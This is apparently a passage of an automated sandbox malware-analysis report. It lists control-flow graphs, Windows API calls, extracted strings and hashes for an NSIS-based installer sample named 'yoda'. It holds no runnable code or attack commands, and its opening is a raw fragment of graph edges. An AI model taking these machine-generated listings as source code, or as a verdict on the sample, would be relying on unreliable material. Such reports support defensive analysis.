3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 

Control-flow Graph

[Figure: control-flow graph, first block 4050f9-405114. Legend: Executed / Not Executed]
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID: jF
                                                                                                                                                                                                                                                                • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353

Control-flow Graph (first block 4015a0-4015f4)
APIs
• PostQuitMessage.USER32(00000000), ref: 00401648
• Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
• SetForegroundWindow.USER32(?), ref: 004016CB
• ShowWindow.USER32(?), ref: 00401753
• ShowWindow.USER32(?), ref: 00401767
• SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
• CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
• GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
• SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
• MoveFileW.KERNEL32(00000000,?), ref: 00401908
• GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
• GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
• SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
Strings
• SetFileAttributes: "%s":%08X, xrefs: 0040177B
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
• Sleep(%d), xrefs: 0040169D
• Call: %d, xrefs: 0040165A
• CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
• CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
• Rename failed: %s, xrefs: 0040194B
• Jump: %d, xrefs: 00401602
• Aborting: "%s", xrefs: 0040161D
• BringToFront, xrefs: 004016BD
• Rename on reboot: %s, xrefs: 00401943
• Rename: %s, xrefs: 004018F8
• CreateDirectory: "%s" created, xrefs: 00401849
• IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
• SetFileAttributes failed., xrefs: 004017A1
• detailprint: %s, xrefs: 00401679

Control-flow Graph (first block 4054a5-4054b7)
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3282139019-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 608394941-2746725676

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,%TechnoBecome%,%TechnoBecome%,00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: %TechnoBecome%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                • API String ID: 4286501637-2879760291

Control-flow Graph
• Function start: 0040337F (basic-block and edge listing omitted)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00427176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: (]C$... %d%%$pAB$vqB$y1B
                                                                                                                                                                                                                                                                • API String ID: 651206458-2710265387

Control-flow Graph
• Function start: 004035B3 (basic-block and edge listing omitted)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705

                                                                                                                                                                                                                                                                Control-flow Graph

